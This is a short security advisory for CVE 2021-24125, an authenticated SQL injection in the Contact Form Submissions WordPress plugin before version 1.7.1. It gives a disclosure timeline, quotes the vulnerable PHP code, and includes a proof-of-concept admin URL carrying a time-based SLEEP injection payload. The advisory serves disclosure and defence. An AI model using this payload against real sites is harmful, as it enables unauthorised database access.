Contact Form Submissions < 1.7.1 – Authenticated SQL Injection | CVE 2021-24125

Description

The wpcf7_contact_form GET parameter is vulnerable to SQL injection when submitting a filter request as a high privilege user (admin+)

Edit (WPScanTeam)

September 28th, 2020 - Escalated to WP & WP Investigating
October 26th, 2020 - Received another submission related a SQL injection in the same parameter but with a different vector: https://wpscan.com/vulnerability/0c3a91d4-a75a-4107-bfc5-015590a72abe
January 3rd, 2021 - No updates, disclosing
March 29th, 2021 - v1.7 released to attempt to remediate the issue using sanitize_text_field(), which does not fix the SQL injection
April 7th, 2021 - v1.7.1 released, fixing the issue

Proof of Concept

if (isset($_GET['wpcf7_contact_form']) && !empty($_GET['wpcf7_contact_form'])) {
            $form_id = esc_attr($_GET['wpcf7_contact_form']);
            $wpcf7s_columns = $this->get_available_columns($form_id);

https://asciinema.org/a/ek0gA455FfKoukISs4AxTxJ5E

https://example.com/wp-admin/edit.php?post_status=all&post_type=wpcf7s&wpcf7_contact_form=(SELECT+42+FROM+(SELECT(SLEEP(5)))aa)&filter_action=Filter&paged=1